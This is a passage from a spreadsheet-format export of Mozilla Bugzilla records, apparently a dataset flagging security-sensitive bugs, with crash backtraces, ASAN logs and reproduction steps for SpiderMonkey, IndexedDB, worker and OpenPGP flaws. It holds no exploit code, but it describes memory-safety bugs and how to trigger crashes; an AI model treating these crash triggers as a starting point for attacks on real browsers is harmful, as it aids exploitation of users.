    #4  0x000055555655e973 in js::jit::RangeAnalysis::analyze (this=this@entry=0x7fffffffc030) at js/src/jit/RangeAnalysis.cpp:2367
    #5  0x000055555645fcd0 in js::jit::OptimizeMIR (mir=mir@entry=0x7ffff5f9a300) at js/src/jit/Ion.cpp:1301
    #6  0x000055555646085d in js::jit::CompileBackEnd (mir=mir@entry=0x7ffff5f9a300) at js/src/jit/Ion.cpp:1628
    #7  0x00005555564617b1 in js::jit::IonCompile (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f27000, script=&lt;optimized out&gt;, baselineFrame=baselineFrame@entry=0x7fffffffc6e8, baselineFrameSize=baselineFrameSize@entry=96, osrPc=osrPc@entry=0x7ffff4cc2dac "\343\024", recompile=&lt;optimized out&gt;, optimizationLevel=js::jit::OptimizationLevel::Normal) at js/src/jit/Ion.cpp:1923
    #8  0x0000555556462126 in js::jit::Compile (cx=cx@entry=0x7ffff5f27000, script=script@entry=..., osrFrame=osrFrame@entry=0x7fffffffc6e8, osrFrameSize=osrFrameSize@entry=96, osrPc=osrPc@entry=0x7ffff4cc2dac "\343\024", forceRecompile=&lt;optimized out&gt;) at js/src/jit/Ion.cpp:2139
    #9  0x0000555556462b9c in BaselineCanEnterAtBranch (pc=0x7ffff4cc2dac "\343\024", osrFrameSize=96, osrFrame=0x7fffffffc6e8, script=..., cx=0x7ffff5f27000) at js/src/jit/Ion.cpp:2335
    #10 IonCompileScriptForBaseline (cx=&lt;optimized out&gt;, frame=frame@entry=0x7fffffffc6e8, frameSize=frameSize@entry=96, pc=pc@entry=0x7ffff4cc2dac "\343\024") at js/src/jit/Ion.cpp:2390
    #11 0x0000555556462fd7 in js::jit::IonCompileScriptForBaselineOSR (cx=&lt;optimized out&gt;, frame=0x7fffffffc6e8, frameSize=96, pc=0x7ffff4cc2dac "\343\024", infoPtr=0x7fffffffc698) at js/src/jit/Ion.cpp:2519
    #12 0x0000364f7e425ee7 in ?? ()
    #13 0x00007fffffffc728 in ?? ()
    #14 0x00007fffffffc698 in ?? ()
    #15 0x00007ffff4dea148 in ?? ()
    #16 0x0000000000000000 in ?? ()
    rax	0x555558071fa0	93825037442976
    rbx	0x7ffff5fa51e0	140737320210912
    rcx	0x555556f5ece0	93825019538656
    rdx	0x0	0
    rsi	0x7ffff6eeb770	140737336227696
    rdi	0x7ffff6eea540	140737336223040
    rbp	0x7fffffffbe90	140737488338576
    rsp	0x7fffffffbe90	140737488338576
    r8	0x7ffff6eeb770	140737336227696
    r9	0x7ffff7fe6cc0	140737354034368
    r10	0x58	88
    r11	0x7ffff6b927a0	140737332717472
    r12	0x7fffffffbef0	140737488338672
    r13	0x7ffff5f9a020	140737320165408
    r14	0x7ffff5f9a710	140737320167184
    r15	0x7ffff4cdb6d0	140737300510416
    rip	0x555556563aa9 &lt;js::jit::Range::assertInvariants() const+409&gt;
    =&gt; 0x555556563aa9 &lt;js::jit::Range::assertInvariants() const+409&gt;:	movl   $0x0,0x0
       0x555556563ab4 &lt;js::jit::Range::assertInvariants() const+420&gt;:	ud2
All the tests I have seen so far require `--ion-gvn=off` but it is possible that a more complicated testcase could get away without that. Hence marking s-s because this is a range analysis problem.</t>
        </is>
      </c>
      <c r="X179" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="180">
      <c r="A180" t="n">
        <v>958867</v>
      </c>
      <c r="B180" t="inlineStr">
        <is>
          <t>2014-01-11 13:52:56 -0800</t>
        </is>
      </c>
      <c r="C180" t="inlineStr">
        <is>
          <t>Make sure to call HoldJSObjects when setting IDBFactory::mOwningObject</t>
        </is>
      </c>
      <c r="D180" t="inlineStr">
        <is>
          <t>2015-02-25 21:54:01 -0800</t>
        </is>
      </c>
      <c r="E180" t="n">
        <v>1</v>
      </c>
      <c r="F180" t="n">
        <v>1</v>
      </c>
      <c r="G180" t="n">
        <v>3</v>
      </c>
      <c r="H180" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I180" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J180" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K180" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L180" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M180" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N180" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O180" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P180" t="inlineStr">
        <is>
          <t>[adv-main28+][adv-esr24.4+][qa-]</t>
        </is>
      </c>
      <c r="Q180" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R180" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S180" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T180" t="n">
        <v>1</v>
      </c>
      <c r="U180" t="n">
        <v>0</v>
      </c>
      <c r="V180" t="n">
        <v>25</v>
      </c>
      <c r="W180" t="inlineStr">
        <is>
          <t>Created attachment 8358847
idb_crash.diff
While testing a patch for bug 958315, it revealed an sg:crit bug in IDB.
We don't always end up tracing mOwningObject because of the missing HoldJSObjects().
Seems to be a regression from http://hg.mozilla.org/mozilla-central/diff/8b5e83943958/dom/indexedDB/IDBFactory.cpp
(Bug 772700 added HoldJSObjects call to another ::Create method)</t>
        </is>
      </c>
      <c r="X180" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="181">
      <c r="A181" t="n">
        <v>826991</v>
      </c>
      <c r="B181" t="inlineStr">
        <is>
          <t>2013-01-05 01:47:55 -0800</t>
        </is>
      </c>
      <c r="C181" t="inlineStr">
        <is>
          <t>Store download state and end time in an annotation (avoid I/O for new history downloads)</t>
        </is>
      </c>
      <c r="D181" t="inlineStr">
        <is>
          <t>2016-08-26 09:07:20 -0700</t>
        </is>
      </c>
      <c r="E181" t="n">
        <v>1</v>
      </c>
      <c r="F181" t="n">
        <v>1</v>
      </c>
      <c r="G181" t="n">
        <v>2</v>
      </c>
      <c r="H181" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I181" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J181" t="inlineStr">
        <is>
          <t>Downloads Panel</t>
        </is>
      </c>
      <c r="K181" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L181" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M181" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N181" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O181" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P181" t="inlineStr"/>
      <c r="Q181" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R181" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S181" t="inlineStr">
        <is>
          <t>Firefox 21</t>
        </is>
      </c>
      <c r="T181" t="n">
        <v>1</v>
      </c>
      <c r="U181" t="n">
        <v>1</v>
      </c>
      <c r="V181" t="n">
        <v>23</v>
      </c>
      <c r="W181" t="inlineStr">
        <is>
          <t>We should do it otherwise the historical downloads will always come with unknown state.</t>
        </is>
      </c>
      <c r="X181" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" t="n">
        <v>958300</v>
      </c>
      <c r="B182" t="inlineStr">
        <is>
          <t>2014-01-09 14:49:23 -0800</t>
        </is>
      </c>
      <c r="C182" t="inlineStr">
        <is>
          <t>UITour: give tour page ability to query browser for Sync configured/not configured state</t>
        </is>
      </c>
      <c r="D182" t="inlineStr">
        <is>
          <t>2014-01-17 12:04:36 -0800</t>
        </is>
      </c>
      <c r="E182" t="n">
        <v>1</v>
      </c>
      <c r="F182" t="n">
        <v>1</v>
      </c>
      <c r="G182" t="n">
        <v>2</v>
      </c>
      <c r="H182" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I182" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J182" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K182" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L182" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M182" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N182" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O182" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P182" t="inlineStr"/>
      <c r="Q182" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R182" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S182" t="inlineStr">
        <is>
          <t>Firefox 29</t>
        </is>
      </c>
      <c r="T182" t="n">
        <v>1</v>
      </c>
      <c r="U182" t="n">
        <v>0</v>
      </c>
      <c r="V182" t="n">
        <v>13</v>
      </c>
      <c r="W182" t="inlineStr">
        <is>
          <t>We'd like to limit Sync promotion in 29 to users who've not already set up Sync in versions prior to 29, for various reasons.
This means that if we have a "Hey, try out sync" in the Australis/29 whatsnew experience, it needs to be able to hide itself if the browser already has sync set up. That requires some way for the page to say "tell me whether sync is set up", and for the browser to respond with a yes/no.</t>
        </is>
      </c>
      <c r="X182" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" t="n">
        <v>24558</v>
      </c>
      <c r="B183" t="inlineStr">
        <is>
          <t>2000-01-20 14:09:36 -0800</t>
        </is>
      </c>
      <c r="C183" t="inlineStr">
        <is>
          <t>CCK aborts unexpectedly.</t>
        </is>
      </c>
      <c r="D183" t="inlineStr">
        <is>
          <t>2000-02-03 14:35:11 -0800</t>
        </is>
      </c>
      <c r="E183" t="n">
        <v>1</v>
      </c>
      <c r="F183" t="n">
        <v>1</v>
      </c>
      <c r="G183" t="n">
        <v>6</v>
      </c>
      <c r="H183" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I183" t="inlineStr">
        <is>
          <t>CCK Graveyard</t>
        </is>
      </c>
      <c r="J183" t="inlineStr">
        <is>
          <t>CCK-Wizard</t>
        </is>
      </c>
      <c r="K183" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L183" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M183" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N183" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O183" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P183" t="inlineStr"/>
      <c r="Q183" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R183" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S183" t="inlineStr">
        <is>
          <t>M15</t>
        </is>
      </c>
      <c r="T183" t="n">
        <v>1</v>
      </c>
      <c r="U183" t="n">
        <v>0</v>
      </c>
      <c r="V183" t="n">
        <v>8</v>
      </c>
      <c r="W183" t="inlineStr">
        <is>
          <t>Latest ns-cck build dated: 01-20-00
O/S: Win98
Steps to Reproduce:
1. Launch CCK
2. Select the "Show Config Info" button
3. Select the "Close" button on the "Show Config Info" dialog
4. Select the Next button on the CCK Welcome Screen.
Results:
CCK Aborts.
Expected to go to the Gathering Info screen after selecting the Welcome screen's 
Next button.</t>
        </is>
      </c>
      <c r="X183" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="184">
      <c r="A184" t="n">
        <v>1675755</v>
      </c>
      <c r="B184" t="inlineStr">
        <is>
          <t>2020-11-06 04:45:08 -0800</t>
        </is>
      </c>
      <c r="C184" t="inlineStr">
        <is>
          <t>Crash on GC after redeclare let or const on the web console [js::gc::Cell::runtimeFromAnyThread (this=0x4b4b4b4b4b4b4b4b)]</t>
        </is>
      </c>
      <c r="D184" t="inlineStr">
        <is>
          <t>2024-05-30 10:23:29 -0700</t>
        </is>
      </c>
      <c r="E184" t="n">
        <v>1</v>
      </c>
      <c r="F184" t="n">
        <v>1</v>
      </c>
      <c r="G184" t="n">
        <v>3</v>
      </c>
      <c r="H184" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I184" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J184" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K184" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N184" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O184" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P184" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main85+][adv-esr78.7+]</t>
        </is>
      </c>
      <c r="Q184" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R184" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S184" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T184" t="n">
        <v>1</v>
      </c>
      <c r="U184" t="n">
        <v>0</v>
      </c>
      <c r="V184" t="n">
        <v>33</v>
      </c>
      <c r="W184" t="inlineStr">
        <is>
          <t>Created attachment 9186217
array-split-reload.html
When mistakenly re-declaration of `let` or `const` on the browser console, then reload the page repeatedly or typing string.split("") or string.split(" ") while waiting browser console instant evaluation result, suddenly the tab is crashed. To trigger the crash, on the HTML file it need to initialize one constant variable i.e `const x = "A"`  
Mostly when Firefox Nightly ASAN crash, it shows `AddressSanitizer: SEGV on unknown address (pc 0x7fa6e7dbe0b9 bp 0x7ffe338b3620 sp 0x7ffe338b3610 T0)` but the unknown address is not showed.
Sometimes Nightly ASAN shows `AddressSanitizer: use-after-poison on address 0x27f915ded218 at pc 0x7f4221357bb8 bp 0x7fffb52d8850 sp 0x7fffb52d8848
READ of size 8 at 0x27f915ded218 thread T0 (Web Content)`
Rare moment, Nightly ASAN show the unknown address: `AddressSanitizer: SEGV on unknown address 0x363339343840 (pc 0x7fdf867b7257 bp 0x7ffe9e3f92b0 sp 0x7ffe9e3f8e20 T0)` (reproduced on Firefox Nightly ASAN 2020-10-26) (64-bit)
It seems Nightly ASAN tried to access address 0x363339343840 which is potentially exploitable and worth to investigate further.
I've attached Firefox Nightly ASAN log, full GDB log (launch with command line `./mach run --debugger="gdb-9" --debugger-args="-q --args" --disable-e10s`), full valgrind log, and PoC video when reproduce the issue.
## Browser tested:
- Firefox 82.0.2 (64-bit) on Arch Linux
- Firefox 78.4.0esr (64-bit) on Arch Linux
- Firefox Nightly 84.0a1 (2020-11-05) (64-bit) on Windows 10
- Firefox Nightly ASAN 84.0a1 (2020-11-05) (64-bit) on Arch Linux
## Steps to Reproduce:
### Reload the page
1. Visit attached file: array-split-reload.html
2. Enter below text to the console:
&gt;&gt; const array = string.split("") ↵ (press enter)
&gt;&gt; const array = string.split("\n") ↵ (press enter)
3. Reload the page repeatedly
4. Tab is crashed.
### Console instant evaluation
1. Visit attached file: array-split.html 
2. Open Web Developer -&gt; Web Console (Ctrl+Shift+K)
3. Enter below text to the console:
&gt;&gt; const array = string.split("\n") ↵ (press enter)
&gt;&gt; const array = string.split("") ↵ (press enter)
4. Type to the console (without press enter):
&gt;&gt; string.split("") 
&gt;&gt; string.split(" ")
&gt;&gt; string.split("")
&gt;&gt; string.split(" ")
&gt;&gt; string.split("")
&gt;&gt; string.split("\n")
&gt;&gt; string.split("")
If above doesn't crash the tab, reload the page, then re-type to the console (without press enter):
&gt;&gt; string.split("")
&gt;&gt; string.split(" ")
&gt;&gt; string.split("")
&gt;&gt; string.split(" ")
&gt;&gt; string.split("")
## What happened? (actual results)
Gah. Your tab just crashed.
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==236847==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7fa6e7dbe0b9 bp 0x7ffe338b3620 sp 0x7ffe338b3610 T0)
==236847==The signal is caused by a READ memory access.
==236847==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
error: address range table at offset 0x5c90 has an invalid tuple (length = 0) at offset 0x5ca0
    #0 0x7fa6e7dbe0b9 in runtimeFromAnyThread /builds/worker/checkouts/gecko/js/src/gc/Cell.h:335:27
    #1 0x7fa6e7dbe0b9 in IsOwnedByOtherRuntime&lt;js::BaseShape *&gt; /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:170:23
    #2 0x7fa6e7dbe0b9 in ShouldMark&lt;js::BaseShape *&gt; /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:885:7
    #3 0x7fa6e7dbe0b9 in void DoMarking&lt;js::BaseShape&gt;(js::GCMarker*, js::BaseShape*) /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:941:8
    #4 0x7fa6e7dbe04d in bool js::gc::TraceEdgeInternal&lt;js::BaseShape*&gt;(JSTracer*, js::BaseShape**, char const*) /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:675:5
    #5 0x7fa6e7dc5250 in js::GCMarker::eagerlyMarkChildren(js::Shape*) /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:1249:13
    #6 0x7fa6e7d94223 in markAndScan&lt;js::Shape&gt; /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:1032:5
    #7 0x7fa6e7d94223 in traverse&lt;js::Shape *&gt; /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:1042:3
    #8 0x7fa6e7d94223 in traverseEdge&lt;JSObject *, js::Shape&gt; /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:1132:3
    #9 0x7fa6e7d94223 in js::GCMarker::processMarkStackTop(js::SliceBudget&amp;) /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:2102:3
    #10 0x7fa6e7d93422 in js::GCMarker::markUntilBudgetExhausted(js::SliceBudget&amp;, js::GCMarker::ShouldReportMarkTime) /builds/worker/checkouts/gecko/js/src/gc/Marking.cpp:1835:7
    #11 0x7fa6e7d4331a in js::gc::GCRuntime::markUntilBudgetExhausted(js::SliceBudget&amp;, js::GCMarker::ShouldReportMarkTime) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:5662:17
    #12 0x7fa6e7d523de in js::gc::GCRuntime::incrementalSlice(js::SliceBudget&amp;, mozilla::Maybe&lt;JSGCInvocationKind&gt; const&amp;, JS::GCReason, js::gc::AutoGCSession&amp;) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:6795:13
    #13 0x7fa6e7d55ed5 in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget, mozilla::Maybe&lt;JSGCInvocationKind&gt; const&amp;, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:7249:3
    #14 0x7fa6e7d58213 in js::gc::GCRuntime::collect(bool, js::SliceBudget, mozilla::Maybe&lt;JSGCInvocationKind&gt; const&amp;, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:7484:9
    #15 0x7fa6e7d32de3 in gcSlice /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:7575:3
    #16 0x7fa6e7d32de3 in js::gc::GCRuntime::gcIfRequested() /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:7769:7
    #17 0x7fa6e7d0345b in gcIfNeededAtAllocation /builds/worker/checkouts/gecko/js/src/gc/Allocator.cpp:451:5
    #18 0x7fa6e7d0345b in bool js::gc::GCRuntime::checkAllocatorState&lt;(js::AllowGC)1&gt;(JSContext*, js::gc::AllocKind) /builds/worker/checkouts/gecko/js/src/gc/Allocator.cpp:406:10
    #19 0x7fa6e7d05674 in JSString* js::AllocateStringImpl&lt;JSString, (js::AllowGC)1&gt;(JSContext*, js::gc::InitialHeap) /builds/worker/checkouts/gecko/js/src/gc/Allocator.cpp:209:15
    #20 0x7fa6e717665d in AllocateString&lt;JSThinInlineString, js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/gc/Allocator.h:61:32
    #21 0x7fa6e717665d in new_&lt;js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/vm/StringType-inl.h:322:10
    #22 0x7fa6e717665d in AllocateInlineString&lt;js::CanGC, unsigned char&gt; /builds/worker/checkouts/gecko/js/src/vm/StringType-inl.h:35:31
    #23 0x7fa6e717665d in NewInlineString&lt;js::CanGC, unsigned char&gt; /builds/worker/checkouts/gecko/js/src/vm/StringType-inl.h:63:25
    #24 0x7fa6e717665d in JSLinearString* js::Int32ToString&lt;(js::AllowGC)1&gt;(JSContext*, int) /builds/worker/checkouts/gecko/js/src/jsnum.cpp:816:7
    #25 0x7fa6e79fd6ee in js::IdVectorToArray(JSContext*, JS::Handle&lt;JS::GCVector&lt;JS::PropertyKey, 0ul, js::TempAllocPolicy&gt; &gt;) /builds/worker/checkouts/gecko/js/src/debugger/Frame.cpp:1926:23
    #26 0x7fa6e7a8c431 in js::DebuggerObject::CallData::getOwnPropertyNamesMethod() /builds/worker/checkouts/gecko/js/src/debugger/Object.cpp:778:24
    #27 0x7fa6e7aad28e in bool js::DebuggerObject::CallData::ToNative&lt;&amp;(js::DebuggerObject::CallData::getOwnPropertyNamesMethod())&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/src/debugger/Object.cpp:243:10
    #28 0x7fa652f6344f  (&lt;unknown module&gt;)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/worker/checkouts/gecko/js/src/gc/Cell.h:335:27 in runtimeFromAnyThread
==236847==ABORTING
JavaScript error: resource:///modules/ContentCrashHandlers.jsm, line 50: TypeError: can't access property "permanentKey", browser is undefined
```</t>
        </is>
      </c>
      <c r="X184" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="185">
      <c r="A185" t="n">
        <v>838226</v>
      </c>
      <c r="B185" t="inlineStr">
        <is>
          <t>2013-02-05 09:30:33 -0800</t>
        </is>
      </c>
      <c r="C185" t="inlineStr">
        <is>
          <t>Update Apps page on MDN to link to Dev hub, improve organization</t>
        </is>
      </c>
      <c r="D185" t="inlineStr">
        <is>
          <t>2013-04-09 10:35:11 -0700</t>
        </is>
      </c>
      <c r="E185" t="n">
        <v>1</v>
      </c>
      <c r="F185" t="n">
        <v>1</v>
      </c>
      <c r="G185" t="n">
        <v>6</v>
      </c>
      <c r="H185" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I185" t="inlineStr">
        <is>
          <t>Developer Documentation Graveyard</t>
        </is>
      </c>
      <c r="J185" t="inlineStr">
        <is>
          <t>Apps</t>
        </is>
      </c>
      <c r="K185" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L185" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M185" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N185" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O185" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P185" t="inlineStr"/>
      <c r="Q185" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R185" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S185" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T185" t="n">
        <v>1</v>
      </c>
      <c r="U185" t="n">
        <v>0</v>
      </c>
      <c r="V185" t="n">
        <v>4</v>
      </c>
      <c r="W185" t="inlineStr">
        <is>
          <t>Need to get this page reorganized and linking to Devhub, tools, etc. by Feb 21st (for MWC).</t>
        </is>
      </c>
      <c r="X185" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="186">
      <c r="A186" t="n">
        <v>1673241</v>
      </c>
      <c r="B186" t="inlineStr">
        <is>
          <t>2020-10-25 05:33:44 -0700</t>
        </is>
      </c>
      <c r="C186" t="inlineStr">
        <is>
          <t>RNP-01-008 WP3 Thunderbird: Partially unencrypted email insufficiently detected (Low)</t>
        </is>
      </c>
      <c r="D186" t="inlineStr">
        <is>
          <t>2022-05-20 04:46:40 -0700</t>
        </is>
      </c>
      <c r="E186" t="n">
        <v>1</v>
      </c>
      <c r="F186" t="n">
        <v>1</v>
      </c>
      <c r="G186" t="n">
        <v>3</v>
      </c>
      <c r="H186" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I186" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J186" t="inlineStr">
        <is>
          <t>Security: OpenPGP</t>
        </is>
      </c>
      <c r="K186" t="inlineStr">
        <is>
          <t>78</t>
        </is>
      </c>
      <c r="L186" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M186" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N186" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O186" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P186" t="inlineStr"/>
      <c r="Q186" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R186" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S186" t="inlineStr">
        <is>
          <t>90 Branch</t>
        </is>
      </c>
      <c r="T186" t="n">
        <v>1</v>
      </c>
      <c r="U186" t="n">
        <v>0</v>
      </c>
      <c r="V186" t="n">
        <v>20</v>
      </c>
      <c r="W186" t="inlineStr">
        <is>
          <t>It was found that a partially unencrypted email has been insufficiently detected as such by Thunderbird. This introduces the risk of users erroneously assuming the entire email was encrypted and therefore ascribing it with an incorrect security status.
***Proof-of-Concept *.eml file:***
refer to Attachment 9182160
It is recommended that the logic for detecting encrypted content receives improvements by design. If parts of the message were decrypted, the whole message should be checked for unencrypted parts. If any parts of the parts were not decrypted, the application should alert the user about partially unprotected information.</t>
        </is>
      </c>
      <c r="X186" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="187">
      <c r="A187" t="n">
        <v>725499</v>
      </c>
      <c r="B187" t="inlineStr">
        <is>
          <t>2012-02-08 15:18:03 -0800</t>
        </is>
      </c>
      <c r="C187" t="inlineStr">
        <is>
          <t>WorkerFinishedRunnable should not be a control runnable.</t>
        </is>
      </c>
      <c r="D187" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E187" t="n">
        <v>1</v>
      </c>
      <c r="F187" t="n">
        <v>1</v>
      </c>
      <c r="G187" t="n">
        <v>3</v>
      </c>
      <c r="H187" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I187" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J187" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K187" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N187" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O187" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P187" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+] Don't unhide or check in test until ESR-10 fixed or EOL</t>
        </is>
      </c>
      <c r="Q187" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R187" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S187" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T187" t="n">
        <v>1</v>
      </c>
      <c r="U187" t="n">
        <v>0</v>
      </c>
      <c r="V187" t="n">
        <v>25</v>
      </c>
      <c r="W187" t="inlineStr">
        <is>
          <t>Consider the following scenario:
A parent worker creates a child worker.  The child worker sends two messages to its parent and then closes itself.  If the parent is running the first message event handler when the delete runnable is posted to the parent thread, the parent will enter the OperationCallback and run the delete runnable.  Then when the event handler returns and we proceed to the second message we will have a WorkerPrivate* that has been deleted.
Ben believes the fix is to make the WorkerFinishRunnable not be a control runnable.</t>
        </is>
      </c>
      <c r="X187" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="188">
      <c r="A188" t="n">
        <v>122826</v>
      </c>
      <c r="B188" t="inlineStr">
        <is>
          <t>2002-01-31 12:08:02 -0800</t>
        </is>
      </c>
      <c r="C188" t="inlineStr">
        <is>
          <t>Changing menu item label doesn't update item</t>
        </is>
      </c>
      <c r="D188" t="inlineStr">
        <is>
          <t>2008-07-31 03:05:53 -0700</t>
        </is>
      </c>
      <c r="E188" t="n">
        <v>1</v>
      </c>
      <c r="F188" t="n">
        <v>1</v>
      </c>
      <c r="G188" t="n">
        <v>3</v>
      </c>
      <c r="H188" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I188" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J188" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K188" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
